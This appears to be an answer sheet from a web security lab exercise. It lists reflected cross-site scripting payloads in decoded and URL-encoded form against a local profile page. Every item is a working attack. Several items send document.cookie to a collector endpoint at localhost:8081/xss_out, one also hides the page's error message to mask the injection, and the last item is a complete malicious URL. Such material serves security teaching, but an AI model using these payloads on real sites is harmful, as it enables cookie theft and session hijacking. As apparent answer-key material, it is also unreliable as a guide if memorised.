2.1: (decoded) <script>alert(document.cookie)</script>
     (encoded) %3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E

2.2: (decoded) <script>document.write('<img src="http://localhost:8081/xss_out?stolen_cookie='+document.cookie+'"/>')</script>
     (encoded) %3Cscript%3Edocument.write(%27%3Cimg%20src%3D%22http%3A%2F%2Flocalhost%3A8081%2Fxss_out%3Fstolen_cookie%3D%27%2Bdocument.cookie%2B%27%22%2F%3E%27)%3C%2Fscript%3E

2.3: (decoded) <script>document.write('<img src="http://localhost:8081/xss_out?stolen_cookie='+document.cookie+'"/>'); document.getElementsByClassName("error")[0].style.visibility="hidden" </script>
     (encoded): %3Cscript%3Edocument.write(%27%3Cimg%20src%3D%22http%3A%2F%2Flocalhost%3A8081%2Fxss_out%3Fstolen_cookie%3D%27%2Bdocument.cookie%2B%27%22%2F%3E%27)%3B%20document.getElementsByClassName(%22error%22)%5B0%5D.style.visibility%3D%22hidden%22%20%3C%2Fscript%3E


2.4: http://localhost:8080/profile/%3Cscript%3Edocument.write(%27%3Cimg%20src%3D%22http%3A%2F%2Flocalhost%3A8081%2Fxss_out%3Fstolen_cookie%3D%27%2Bdocument.cookie%2B%27%22%2F%3E%27)%3B%20document.getElementsByClassName(%22error%22)%5B0%5D.style.visibility%3D%22hidden%22%20%3C%2Fscript%3E
